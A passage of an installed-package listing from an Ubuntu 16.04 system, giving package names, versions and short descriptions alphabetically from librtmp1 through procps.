librtmp1:amd64 2.4+20151223.gitfa8646d-1ubuntu0.1 toolkit for RTMP streams (shared library)
libsamplerate0:amd64 0.1.8-8 Audio sample rate conversion library
libsane:amd64 1.0.25+git20150528-1ubuntu2.16.04.1 API library for scanners
libsane-common 1.0.25+git20150528-1ubuntu2.16.04.1 API library for scanners -- documentation and support files
libsane-hpaio:amd64 3.16.3+repack0-1 HP SANE backend for multi-function peripherals
libsasl2-2:amd64 2.1.26.dfsg1-14build1 Cyrus SASL - authentication abstraction library
libsasl2-modules:amd64 2.1.26.dfsg1-14build1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:amd64 2.1.26.dfsg1-14build1 Cyrus SASL - pluggable authentication modules (DB)
libsbc1:amd64 1.3-1 Sub Band CODEC library - runtime
libseccomp2:amd64 2.2.3-3ubuntu3 high level interface to Linux seccomp filter
libsecret-1-0:amd64 0.18.4-1ubuntu2 Secret store
libsecret-common 0.18.4-1ubuntu2 Secret store (common files)
libselinux1:amd64 2.4-3build2 SELinux runtime shared libraries
libsemanage-common 2.3-1build3 Common files for SELinux policy management libraries
libsemanage1:amd64 2.3-1build3 SELinux policy management library
libsensors4:amd64 1:3.4.0-2 library to read temperature/voltage/fan sensors
libsepol1:amd64 2.4-2 SELinux library for manipulating binary security policies
libsgutils2-2 1.40-0ubuntu1 utilities for devices using the SCSI command set (shared libraries)
libshout3:amd64 2.3.1-3 MP3/Ogg Vorbis broadcast streaming library
libsigc++-2.0-0v5:amd64 2.6.2-1 type-safe Signal Framework for C++ - runtime
libsignon-extension1:amd64 8.58+16.04.20151106-0ubuntu1 Single Sign On framework
libsignon-glib1:amd64 1.13+16.04.20151209.1-0ubuntu1 library for signond
libsignon-plugins-common1:amd64 8.58+16.04.20151106-0ubuntu1 Single Sign On framework
libsignon-qt5-1:amd64 8.58+16.04.20151106-0ubuntu1 Single Sign On framework
libslang2:amd64 2.3.0-2ubuntu1 S-Lang programming library - runtime version
libsm6:amd64 2:1.2.2-1 X11 Session Management library
libsmartcols1:amd64 2.27.1-6ubuntu3.3 smart column output alignment library
libsmbclient:amd64 2:4.3.11+dfsg-0ubuntu0.16.04.11 shared library for communication with SMB/CIFS servers
libsnapd-glib1:amd64 1.13-0ubuntu0.16.04.1 GLib snapd library
libsndfile1:amd64 1.0.25-10ubuntu0.16.04.1 Library for reading/writing audio files
libsnmp-base 5.7.3+dfsg-1ubuntu4 SNMP configuration script, MIBs and documentation
libsnmp30:amd64 5.7.3+dfsg-1ubuntu4 SNMP (Simple Network Management Protocol) library
libsocket6-perl 0.25-1build2 Perl extensions for IPv6
libsonic0:amd64 0.2.0-3 Simple library to speed up or slow down speech
libsoup-gnome2.4-1:amd64 2.52.2-1ubuntu0.2 HTTP library implementation in C -- GNOME support library
libsoup2.4-1:amd64 2.52.2-1ubuntu0.2 HTTP library implementation in C -- Shared library
libspectre1:amd64 0.2.7-3ubuntu2 Library for rendering PostScript documents
libspeechd2:amd64 0.8.3-1ubuntu3 Speech Dispatcher: Shared libraries
libspeex1:amd64 1.2~rc1.2-1ubuntu1 The Speex codec runtime library
libspeexdsp1:amd64 1.2~rc1.2-1ubuntu1 The Speex extended runtime library
libsqlite3-0:amd64 3.11.0-1ubuntu1 SQLite 3 shared library
libss2:amd64 1.42.13-1ubuntu1 command-line interface parsing library
libssh-4:amd64 0.6.3-4.3 tiny C SSH library (OpenSSL flavor)
libssl1.0.0:amd64 1.0.2g-1ubuntu4.9 Secure Sockets Layer toolkit - shared libraries
libstartup-notification0:amd64 0.12-4build1 library for program launch feedback (shared library)
libstdc++-5-dev:amd64 5.4.0-6ubuntu1~16.04.5 GNU Standard C++ Library v3 (development files)
libstdc++6:amd64 5.4.0-6ubuntu1~16.04.5 GNU Standard C++ Library v3
libsub-name-perl 0.14-1build1 module for assigning a new name to referenced sub
libsuitesparseconfig4.4.6:amd64 1:4.4.6-1 configuration routines for all SuiteSparse modules
libsystemd0:amd64 229-4ubuntu21 systemd utility library
libtag1v5:amd64 1.9.1-2.4ubuntu1 audio meta-data library
libtag1v5-vanilla:amd64 1.9.1-2.4ubuntu1 audio meta-data library - vanilla flavour
libtalloc2:amd64 2.1.5-2 hierarchical pool based memory allocator
libtasn1-6:amd64 4.7-3ubuntu0.16.04.2 Manage ASN.1 structures (runtime)
libtcl8.6:amd64 8.6.5+dfsg-2 Tcl (the Tool Command Language) v8.6 - run-time library files
libtdb1:amd64 1.3.8-2 Trivial Database - shared library
libtelepathy-glib0:amd64 0.24.1-1.1 Telepathy framework - GLib library
libtevent0:amd64 0.9.28-0ubuntu0.16.04.1 talloc-based event loop library - shared library
libtext-charwidth-perl 0.04-7build5 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5build4 converts between character sets in Perl
libtext-levenshtein-perl 0.13-1 implementation of the Levenshtein edit distance
libtext-wrapi18n-perl 0.06-7.1 internationalized substitute of Text::Wrap
libthai-data 0.1.24-2 Data files for Thai language support library
libthai0:amd64 0.1.24-2 Thai language support library
libtheora0:amd64 1.1.1+dfsg.1-8 Theora Video Compression Codec
libtie-ixhash-perl 1.23-2 Perl module to order associative arrays
libtiff5:amd64 4.0.6-1ubuntu0.2 Tag Image File Format (TIFF) library
libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
libtimezonemap-data 0.4.5 GTK+3 timezone map widget - data files
libtimezonemap1:amd64 0.4.5 GTK+3 timezone map widget
libtinfo5:amd64 6.0+20160213-1ubuntu1 shared low-level terminfo library for terminal handling
libtk8.6:amd64 8.6.5-1 Tk toolkit for Tcl and X11 v8.6 - run-time files
libtotem-plparser-common 3.10.6-1ubuntu1 Totem Playlist Parser library - common files
libtotem-plparser18:amd64 3.10.6-1ubuntu1 Totem Playlist Parser library - runtime files
libtotem0:amd64 3.18.1-1ubuntu4 Main library for the Totem media player
libtracker-sparql-1.0-0:amd64 1.6.2-0ubuntu1.1 metadata database, indexer and search tool - library
libtsan0:amd64 5.4.0-6ubuntu1~16.04.5 ThreadSanitizer -- a Valgrind-based detector of data races (runtime)
libtxc-dxtn-s2tc0:amd64 0~git20131104-1.1 Texture compression library for Mesa
libubsan0:amd64 5.4.0-6ubuntu1~16.04.5 UBSan -- undefined behaviour sanitizer (runtime)
libubuntugestures5:amd64 1.3.1918+16.04.20160404-0ubuntu1 Ubuntu gestures library for Ubuntu UI Toolkit
libubuntutoolkit5:amd64 1.3.1918+16.04.20160404-0ubuntu1 Ubuntu toolkit common library for Ubuntu UI Toolkit
libudev1:amd64 229-4ubuntu21 libudev shared library
libudisks2-0:amd64 2.1.7-1ubuntu1 GObject based library to access udisks2
libunistring0:amd64 0.9.3-5.2ubuntu1 Unicode string library for C
libunity-action-qt1:amd64 1.1.0+14.04.20140304-0ubuntu2~gcc5.1 Unity Action Qt API
libunity-control-center1 15.04.0+16.04.20170214-0ubuntu1 utilities to configure the GNOME desktop
libunity-core-6.0-9:amd64 7.4.0+16.04.20160906-0ubuntu1 core library for the Unity interface
libunity-gtk2-parser0:amd64 0.0.0+15.04.20150118-0ubuntu2 GtkMenuShell to GMenuModel parser
libunity-gtk3-parser0:amd64 0.0.0+15.04.20150118-0ubuntu2 GtkMenuShell to GMenuModel parser
libunity-misc4 4.0.5+14.04.20140115-0ubuntu1 Miscellaneous functions for Unity - shared library
libunity-protocol-private0:amd64 7.1.4+16.04.20160701-0ubuntu1 binding to get places into the launcher - private library
libunity-scopes-json-def-desktop 7.1.4+16.04.20160701-0ubuntu1 binding to get places into the launcher - desktop def file
libunity-settings-daemon1:amd64 15.04.1+16.04.20160701-0ubuntu1 Helper library for accessing settings
libunity-webapps0:amd64 2.5.0~+16.04.20160201-0ubuntu1 Web Apps integration with the Unity desktop
libunity9:amd64 7.1.4+16.04.20160701-0ubuntu1 binding to get places into the launcher - shared library
libunwind8 1.1-4.1 library to determine the call-chain of a program - runtime
libupower-glib3:amd64 0.99.4-2ubuntu0.3 abstraction for power management - shared library
liburi-perl 1.71-1 module to manipulate and access URI strings
liburl-dispatcher1:amd64 0.1+16.04.20151110-0ubuntu2 library for sending requests to the url dispatcher
libusb-0.1-4:amd64 2:0.1.12-28 userspace USB programming library
libusb-1.0-0:amd64 2:1.0.20-1 userspace USB programming library
libusbmuxd4:amd64 1.0.10-2ubuntu0.1 USB multiplexor daemon for iPhone and iPod Touch devices - library
libustr-1.0-1:amd64 1.0.4-5 Micro string library: shared library
libutempter0:amd64 1.1.6-3 privileged helper for utmp/wtmp updates (runtime)
libuuid-perl 0.24-1build1 Perl extension for using UUID interfaces as defined in e2fsprogs
libuuid1:amd64 2.27.1-6ubuntu3.3 Universally Unique ID library
libv4l-0:amd64 1.10.0-1 Collection of video4linux support libraries
libv4lconvert0:amd64 1.10.0-1 Video4linux frame format conversion library
libvisio-0.1-1:amd64 0.1.5-1ubuntu1 library for parsing the visio file structure
libvisual-0.4-0:amd64 0.4.0-8 audio visualization framework
libvncclient1:amd64 0.9.10+dfsg-3ubuntu0.16.04.1 API to write one's own VNC server - client library
libvorbis0a:amd64 1.3.5-3 decoder library for Vorbis General Audio Compression Codec
libvorbisenc2:amd64 1.3.5-3 encoder library for Vorbis General Audio Compression Codec
libvorbisfile3:amd64 1.3.5-3 high-level API for Vorbis General Audio Compression Codec
libvpx3:amd64 1.5.0-2ubuntu1 VP8 and VP9 video codec (shared library)
libvte-2.91-0:amd64 0.42.5-1ubuntu1 Terminal emulator widget for GTK+ 3.0 - runtime files
libvte-2.91-common 0.42.5-1ubuntu1 Terminal emulator widget for GTK+ 3.0 - common files
libwacom-bin 0.22-1~ubuntu16.04.1 Wacom model feature query library -- binaries
libwacom-common 0.22-1~ubuntu16.04.1 Wacom model feature query library (common files)
libwacom2:amd64 0.22-1~ubuntu16.04.1 Wacom model feature query library
libwavpack1:amd64 4.75.2-2 audio codec (lossy and lossless) - library
libwayland-client0:amd64 1.12.0-1~ubuntu16.04.2 wayland compositor infrastructure - client library
libwayland-cursor0:amd64 1.12.0-1~ubuntu16.04.2 wayland compositor infrastructure - cursor library
libwayland-egl1-mesa:amd64 17.0.7-0ubuntu0.16.04.2 implementation of the Wayland EGL platform -- runtime
libwayland-server0:amd64 1.12.0-1~ubuntu16.04.2 wayland compositor infrastructure - server library
libwbclient0:amd64 2:4.3.11+dfsg-0ubuntu0.16.04.11 Samba winbind client library
libwebkit2gtk-4.0-37:amd64 2.18.0-0ubuntu0.16.04.2 Web content engine library for GTK+
libwebkit2gtk-4.0-37-gtk2:amd64 2.18.0-0ubuntu0.16.04.2 Web content engine library for GTK+ - GTK+2 plugin process
libwebp5:amd64 0.4.4-1 Lossy compression of digital photographic images.
libwebpmux1:amd64 0.4.4-1 Lossy compression of digital photographic images.
libwebrtc-audio-processing-0:amd64 0.1-3ubuntu1~gcc5.1 AudioProcessing module from the WebRTC project.
libwhoopsie-preferences0 0.18 Ubuntu error tracker submission settings - shared library
libwhoopsie0:amd64 0.2.52.5 Ubuntu error tracker submission - shared library
libwind0-heimdal:amd64 1.7~git20150920+dfsg-4ubuntu1.16.04.1 Heimdal Kerberos - stringprep implementation
libwinpr-crt0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (crt library)
libwinpr-dsparse0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (dsparse library)
libwinpr-environment0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (environment library)
libwinpr-file0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (file library)
libwinpr-handle0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (handle library)
libwinpr-heap0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (heap library)
libwinpr-input0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (input library)
libwinpr-interlocked0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (interlocked library)
libwinpr-library0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (library)
libwinpr-path0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (path library)
libwinpr-pool0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (pool library)
libwinpr-registry0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (registry library)
libwinpr-rpc0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (RPC library)
libwinpr-sspi0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (sspi library)
libwinpr-synch0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (synch library)
libwinpr-sysinfo0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (sysinfo library)
libwinpr-thread0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (thread library)
libwinpr-utils0.1:amd64 1.1.0~git20140921.1.440916e+dfsg1-5ubuntu1.2 Windows Portable Runtime library (utils library)
libwmf0.2-7:amd64 0.2.8.4-10.5ubuntu1 Windows metafile conversion library
libwmf0.2-7-gtk 0.2.8.4-10.5ubuntu1 Windows metafile conversion library
libwnck-3-0:amd64 3.14.1-2 Window Navigator Construction Kit - runtime files
libwnck-3-common 3.14.1-2 Window Navigator Construction Kit - common files
libwpd-0.10-10:amd64 0.10.1-1ubuntu1 Library for handling WordPerfect documents (shared library)
libwpg-0.3-3:amd64 0.3.1-1ubuntu1 WordPerfect graphics import/convert library (shared library)
libwps-0.4-4:amd64 0.4.3-1ubuntu1 Works text file format import filter library (shared library)
libwrap0:amd64 7.6.q-25 Wietse Venema's TCP wrappers library
libwww-perl 6.15-1 simple and consistent interface to the world-wide web
libwww-robotrules-perl 6.01-1 database of robots.txt-derived permissions
libx11-6:amd64 2:1.6.3-1ubuntu2 X11 client-side library
libx11-data 2:1.6.3-1ubuntu2 X11 client-side library
libx11-protocol-perl 0.56-7 Perl module for the X Window System Protocol, version 11
libx11-xcb1:amd64 2:1.6.3-1ubuntu2 Xlib/XCB interface library
libx86-1:amd64 1.1+ds1-10 x86 real-mode library
libxapian22v5:amd64 1.2.22-2 Search engine library
libxatracker2:amd64 17.0.7-0ubuntu0.16.04.2 X acceleration library -- runtime
libxau6:amd64 1:1.0.8-1 X11 authorisation library
libxaw7:amd64 2:1.0.13-1 X11 Athena Widget library
libxcb-dri2-0:amd64 1.11.1-1ubuntu1 X C Binding, dri2 extension
libxcb-dri3-0:amd64 1.11.1-1ubuntu1 X C Binding, dri3 extension
libxcb-glx0:amd64 1.11.1-1ubuntu1 X C Binding, glx extension
libxcb-icccm4:amd64 0.4.1-1ubuntu1 utility libraries for X C Binding -- icccm
libxcb-image0:amd64 0.4.0-1build1 utility libraries for X C Binding -- image
libxcb-keysyms1:amd64 0.4.0-1 utility libraries for X C Binding -- keysyms
libxcb-present0:amd64 1.11.1-1ubuntu1 X C Binding, present extension
libxcb-randr0:amd64 1.11.1-1ubuntu1 X C Binding, randr extension
libxcb-render-util0:amd64 0.3.9-1 utility libraries for X C Binding -- render-util
libxcb-render0:amd64 1.11.1-1ubuntu1 X C Binding, render extension
libxcb-shape0:amd64 1.11.1-1ubuntu1 X C Binding, shape extension
libxcb-shm0:amd64 1.11.1-1ubuntu1 X C Binding, shm extension
libxcb-sync1:amd64 1.11.1-1ubuntu1 X C Binding, sync extension
libxcb-util1:amd64 0.4.0-0ubuntu3 utility libraries for X C Binding -- atom, aux and event
libxcb-xfixes0:amd64 1.11.1-1ubuntu1 X C Binding, xfixes extension
libxcb-xkb1:amd64 1.11.1-1ubuntu1 X C Binding, XKEYBOARD extension
libxcb1:amd64 1.11.1-1ubuntu1 X C Binding
libxcomposite1:amd64 1:0.4.4-1 X11 Composite extension library
libxcursor1:amd64 1:1.1.14-1 X cursor management library
libxdamage1:amd64 1:1.1.4-2 X11 damaged region extension library
libxdmcp6:amd64 1:1.1.2-1.1 X11 Display Manager Control Protocol library
libxext6:amd64 2:1.3.3-1 X11 miscellaneous extension library
libxfixes3:amd64 1:5.0.1-2 X11 miscellaneous 'fixes' extension library
libxfont1:amd64 1:1.5.1-1ubuntu0.16.04.3 X11 font rasterisation library
libxfont2:amd64 1:2.0.1-3~ubuntu16.04.2 X11 font rasterisation library
libxft2:amd64 2.3.2-1 FreeType-based font drawing library for X
libxi6:amd64 2:1.7.6-1 X11 Input extension library
libxinerama1:amd64 2:1.1.3-1 X11 Xinerama extension library
libxkbcommon-x11-0:amd64 0.5.0-1ubuntu2 library to create keymaps with the XKB X11 protocol
libxkbcommon0:amd64 0.5.0-1ubuntu2 library interface to the XKB compiler - shared library
libxkbfile1:amd64 1:1.0.9-0ubuntu1 X11 keyboard file manipulation library
libxklavier16:amd64 5.4-0ubuntu2 X Keyboard Extension high-level API
libxml-parser-perl 2.44-1build1 Perl module for parsing XML files
libxml-twig-perl 1:3.48-1 Perl module for processing huge XML documents in tree mode
libxml-xpathengine-perl 0.13-1 re-usable XPath engine for DOM-like trees
libxml2:amd64 2.9.3+dfsg1-1ubuntu0.3 GNOME XML library
libxmu6:amd64 2:1.1.2-2 X11 miscellaneous utility library
libxmuu1:amd64 2:1.1.2-2 X11 miscellaneous micro-utility library
libxpm4:amd64 1:3.5.11-1ubuntu0.16.04.1 X11 pixmap library
libxrandr2:amd64 2:1.5.0-1 X11 RandR extension library
libxrender1:amd64 1:0.9.9-0ubuntu1 X Rendering Extension client library
libxres1:amd64 2:1.0.7-1 X11 Resource extension library
libxshmfence1:amd64 1.2-1 X shared memory fences - shared library
libxslt1.1:amd64 1.1.28-2.1ubuntu0.1 XSLT 1.0 processing library - runtime library
libxss1:amd64 1:1.2.2-1 X11 Screen Saver extension library
libxt6:amd64 1:1.1.5-0ubuntu1 X11 toolkit intrinsics library
libxtables11:amd64 1.6.0-2ubuntu3 netfilter xtables library
libxtst6:amd64 2:1.2.2-1 X11 Testing -- Record extension library
libxv1:amd64 2:1.0.10-1 X11 Video extension library
libxvmc1:amd64 2:1.0.9-1ubuntu1 X11 Video extension library
libxxf86dga1:amd64 2:1.1.4-1 X11 Direct Graphics Access extension library
libxxf86vm1:amd64 1:1.1.4-1 X11 XFree86 video mode extension library
libyajl2:amd64 2.1.0-2 Yet Another JSON Library
libyaml-0-2:amd64 0.1.6-3 Fast YAML 1.1 parser and emitter library
libyaml-libyaml-perl 0.41-6build1 Perl interface to libyaml, a YAML implementation
libyaml-tiny-perl 1.69-1 Perl module for reading and writing YAML files
libyelp0:amd64 3.18.1-1ubuntu4 Library for the GNOME help browser
libzeitgeist-1.0-1:amd64 0.3.18-1ubuntu3 library to access Zeitgeist - shared library
libzeitgeist-2.0-0:amd64 0.9.16-0ubuntu4 library to access Zeitgeist - shared library
light-themes 14.04+16.04.20161024-0ubuntu1 Light Themes (Ambiance and Radiance)
lightdm 1.18.3-0ubuntu1.1 Display Manager
lintian 2.5.43ubuntu0.1 Debian package checker
linux-base 4.0ubuntu1 Linux image base package
linux-firmware 1.157.13 Firmware for Linux kernel drivers
linux-generic-hwe-16.04 4.10.0.28.31 Complete Generic Linux kernel and headers
linux-headers-4.10.0-28 4.10.0-28.32~16.04.2 Header files related to Linux kernel version 4.10.0
linux-headers-4.10.0-28-generic 4.10.0-28.32~16.04.2 Linux kernel headers for version 4.10.0 on 64 bit x86 SMP
linux-headers-generic-hwe-16.04 4.10.0.28.31 Generic Linux kernel headers
linux-image-4.10.0-28-generic 4.10.0-28.32~16.04.2 Linux kernel image for version 4.10.0 on 64 bit x86 SMP
linux-image-extra-4.10.0-28-generic 4.10.0-28.32~16.04.2 Linux kernel extra modules for version 4.10.0 on 64 bit x86 SMP
linux-image-generic-hwe-16.04 4.10.0.28.31 Generic Linux kernel image
linux-libc-dev:amd64 4.4.0-98.121 Linux Kernel Headers for development
linux-sound-base 1.0.25+dfsg-0ubuntu5 base package for ALSA and OSS sound systems
locales 2.23-0ubuntu9 GNU C Library: National Language (locale) data [support]
login 1:4.2-3.1ubuntu5.3 system login tools
logrotate 3.8.7-2ubuntu2.16.04.2 Log rotation utility
lp-solve 5.5.0.13-7build2 Solve (mixed integer) linear programming problems
lsb-base 9.20160110ubuntu0.2 Linux Standard Base init script functionality
lsb-release 9.20160110ubuntu0.2 Linux Standard Base version reporting utility
lshw 02.17-1.1ubuntu3.4 information about hardware configuration
lsof 4.89+dfsg-0.1 Utility to list open files
ltrace 0.7.3-5.1ubuntu4 Tracks runtime library calls in dynamically linked programs
make 4.1-6 utility for directing compilation
makedev 2.3.1-93ubuntu2~ubuntu16.04.1 creates device files in /dev
man-db 2.7.5-1 on-line manual pager
manpages 4.04-2 Manual pages about using a GNU/Linux system
manpages-dev 4.04-2 Manual pages about using GNU/Linux for development
mawk 1.3.3-17ubuntu2 a pattern scanning and text processing language
media-player-info 22-2 Media player identification files
memtest86+ 5.01-3ubuntu2 thorough real-mode memory tester
metacity-common 1:3.18.7-0ubuntu0.3 shared files for the Metacity window manager
mime-support 3.59ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs
mlocate 0.26-1ubuntu2 quickly find files on the filesystem based on their name
mobile-broadband-provider-info 20140317-1 database of mobile broadband service providers
modemmanager 1.4.12-1ubuntu1 D-Bus service for managing modems
mount 2.27.1-6ubuntu3.3 tools for mounting and manipulating filesystems
mountall 2.54ubuntu1 filesystem mounting tool
mousetweaks 3.12.0-1ubuntu2 mouse accessibility enhancements for the GNOME desktop
mscompress 0.4-3 Microsoft "compress.exe/expand.exe" compatible (de)compressor
mtools 4.0.18-2ubuntu0.16.04 Tools for manipulating MSDOS files
mtr-tiny 0.86-1ubuntu0.1 Full screen ncurses traceroute tool
multiarch-support 2.23-0ubuntu9 Transitional package to ensure multiarch compatibility
mysql-client 5.7.20-0ubuntu0.16.04.1 MySQL database client (metapackage depending on the latest version)
mysql-client-5.7 5.7.20-0ubuntu0.16.04.1 MySQL database client binaries
mysql-client-core-5.7 5.7.20-0ubuntu0.16.04.1 MySQL database core client binaries
mysql-common 5.7.20-0ubuntu0.16.04.1 MySQL database common files, e.g. /etc/mysql/my.cnf
mysql-server 5.7.20-0ubuntu0.16.04.1 MySQL database server (metapackage depending on the latest version)
mysql-server-5.7 5.7.20-0ubuntu0.16.04.1 MySQL database server binaries and system database setup
mysql-server-core-5.7 5.7.20-0ubuntu0.16.04.1 MySQL database server binaries
mythes-en-us 1:5.1.0-1ubuntu2.2 English (USA) Thesaurus for LibreOffice
nano 2.5.3-2ubuntu2 small, friendly text editor inspired by Pico
nautilus 1:3.18.4.is.3.14.3-0ubuntu6 file manager and graphical shell for GNOME
nautilus-data 1:3.18.4.is.3.14.3-0ubuntu6 data files for nautilus
nautilus-sendto 3.8.2-1ubuntu1 integrates Evolution and Pidgin into the Nautilus file manager
nautilus-share 0.7.3-2ubuntu1 Nautilus extension to share folder using Samba
ncurses-base 6.0+20160213-1ubuntu1 basic terminal type definitions
ncurses-bin 6.0+20160213-1ubuntu1 terminal-related programs and man pages
ncurses-term 6.0+20160213-1ubuntu1 additional terminal type definitions
net-tools 1.60-26ubuntu1 NET-3 networking toolkit
netbase 5.3 Basic TCP/IP networking system
netcat-openbsd 1.105-7ubuntu1 TCP/IP swiss army knife
netpbm 2:10.0-15.3 Graphics conversion tools between image formats
network-manager 1.2.6-0ubuntu0.16.04.1 network management framework (daemon and userspace tools)
network-manager-gnome 1.2.6-0ubuntu0.16.04.4 network management framework (GNOME frontend)
network-manager-pptp 1.1.93-1ubuntu1 network management framework (PPTP plugin core)
network-manager-pptp-gnome 1.1.93-1ubuntu1 network management framework (PPTP plugin GNOME GUI)
notify-osd 0.9.35+16.04.20160415-0ubuntu1 daemon that displays passive pop-up notifications
notify-osd-icons 0.8+15.10.20151016.2-0ubuntu1 Notify-OSD icons
ntfs-3g 1:2015.3.14AR.1-1ubuntu0.1 read/write NTFS driver for FUSE
nux-tools 4.0.8+16.04.20160705-0ubuntu1 Visual rendering toolkit for real-time applications - tools
onboard 1.2.0-0ubuntu5 Simple On-screen Keyboard
onboard-data 1.2.0-0ubuntu5 Language model files for the word suggestion feature of Onboard
openoffice.org-hyphenation 0.9 Hyphenation patterns for OpenOffice.org
openprinting-ppds 20160212-0ubuntu1 OpenPrinting printer support - PostScript PPD files
openssh-client 1:7.2p2-4ubuntu2.2 secure shell (SSH) client, for secure access to remote machines
openssh-server 1:7.2p2-4ubuntu2.2 secure shell (SSH) server, for secure access from remote machines
openssh-sftp-server 1:7.2p2-4ubuntu2.2 secure shell (SSH) sftp server module, for SFTP access from remote machines
openssl 1.0.2g-1ubuntu4.9 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.70ubuntu3.3 utility to detect other OSes on a set of drives
overlay-scrollbar 0.2.17.1+16.04.20151117-0ubuntu1.16.04.1 Scrollbar overlay - configuration
overlay-scrollbar-gtk2:amd64 0.2.17.1+16.04.20151117-0ubuntu1.16.04.1 GTK 2 module for overlay scrollbars
oxideqt-codecs:amd64 1.21.5-0ubuntu0.16.04.1 Web browser engine for Qt (codecs)
p11-kit 0.23.2-5~ubuntu16.04.1 p11-glue utilities
p11-kit-modules:amd64 0.23.2-5~ubuntu16.04.1 p11-glue proxy and trust modules
parted 3.2-15 disk partition manipulator
passwd 1:4.2-3.1ubuntu5.3 change and administer password and group data
patch 2.7.5-1 Apply a diff file to an original
patchutils 0.3.4-1 Utilities to work with patches
pciutils 1:3.3.1-1.1ubuntu1.1 Linux PCI Utilities
pcmciautils 018-8 PCMCIA utilities for Linux 2.6
perl 5.22.1-9ubuntu0.2 Larry Wall's Practical Extraction and Report Language
perl-base 5.22.1-9ubuntu0.2 minimal Perl system
perl-modules-5.22 5.22.1-9ubuntu0.2 Core Perl modules
php-common 1:35ubuntu6 Common files for PHP packages
php7.0 7.0.22-0ubuntu0.16.04.1 server-side, HTML-embedded scripting language (metapackage)
php7.0-cgi 7.0.22-0ubuntu0.16.04.1 server-side, HTML-embedded scripting language (CGI binary)
php7.0-cli 7.0.22-0ubuntu0.16.04.1 command-line interpreter for the PHP scripting language
php7.0-common 7.0.22-0ubuntu0.16.04.1 documentation, examples and common module for PHP
php7.0-gd 7.0.22-0ubuntu0.16.04.1 GD module for PHP
php7.0-json 7.0.22-0ubuntu0.16.04.1 JSON module for PHP
php7.0-mysql 7.0.22-0ubuntu0.16.04.1 MySQL module for PHP
php7.0-opcache 7.0.22-0ubuntu0.16.04.1 Zend OpCache module for PHP
php7.0-readline 7.0.22-0ubuntu0.16.04.1 readline module for PHP
pinentry-curses 0.9.7-3 curses-based PIN or pass-phrase entry dialog for GnuPG
pinentry-gnome3 0.9.7-3 GNOME 3 PIN or pass-phrase entry dialog for GnuPG
pkg-config 0.29.1-0ubuntu1 manage compile and link flags for libraries
plainbox-provider-checkbox 0.25-1 CheckBox provider for PlainBox
plainbox-provider-resource-generic 0.23-1 CheckBox generic resource jobs provider
plainbox-secure-policy 0.25-1 policykit policy required to use plainbox (secure version)
plymouth 0.9.2-3ubuntu13.2 boot animation, logger and I/O multiplexer
plymouth-label 0.9.2-3ubuntu13.2 boot animation, logger and I/O multiplexer - label control
plymouth-theme-ubuntu-logo 0.9.2-3ubuntu13.2 boot animation, logger and I/O multiplexer - ubuntu theme
plymouth-theme-ubuntu-text 0.9.2-3ubuntu13.2 boot animation, logger and I/O multiplexer - ubuntu text theme
pm-utils 1.4.1-16 utilities and scripts for power management
policykit-1 0.105-14.1 framework for managing administrative policies and privileges
policykit-1-gnome 0.105-2ubuntu2 GNOME authentication agent for PolicyKit-1
policykit-desktop-privileges 0.20 run common desktop actions without password
poppler-data 0.4.7-7 encoding data for the poppler PDF rendering library
poppler-utils 0.41.0-0ubuntu1.5 PDF utilities (based on Poppler)
popularity-contest 1.64ubuntu2 Vote for your favourite packages automatically
powermgmt-base 1.31+nmu1 Common utils and configs for power management
ppp 2.4.7-1+2ubuntu1 Point-to-Point Protocol (PPP) - daemon
pppconfig 2.3.22 Text menu based utility for configuring ppp
pppoeconf 1.21ubuntu1 configures PPPoE/ADSL connections
pptp-linux 1.8.0-1 Point-to-Point Tunneling Protocol (PPTP) Client
printer-driver-brlaser 3-5~ubuntu1 printer driver for (some) Brother laser printers
printer-driver-c2esp 27-2 printer driver for Kodak ESP AiO color inkjet Series
printer-driver-foo2zjs 20151024dfsg0-1ubuntu1 printer driver for ZjStream-based printers
printer-driver-foo2zjs-common 20151024dfsg0-1ubuntu1 printer driver for ZjStream-based printers - common files
printer-driver-gutenprint 5.2.11-1 printer drivers for CUPS
printer-driver-hpcups 3.16.3+repack0-1 HP Linux Printing and Imaging - CUPS Raster driver (hpcups)
printer-driver-min12xxw 0.0.9-9 printer driver for KonicaMinolta PagePro 1[234]xxW
printer-driver-pnm2ppa 1.13+nondbs-0ubuntu5 printer driver for HP-GDI printers
printer-driver-postscript-hp 3.16.3+repack0-1 HP Printers PostScript Descriptions
printer-driver-ptouch 1.4-1 printer driver Brother P-touch label printers
printer-driver-pxljr 1.4+repack0-4 printer driver for HP Color LaserJet 35xx/36xx
printer-driver-sag-gdi 0.1-4ubuntu1 printer driver for Ricoh Aficio SP 1000s/SP 1100s
printer-driver-splix 2.0.0+svn315-4fakesync1 Driver for Samsung and Xerox SPL2 and SPLc laser printers
procps 2:3.3.10-4ubuntu2.3 /proc file system utilities
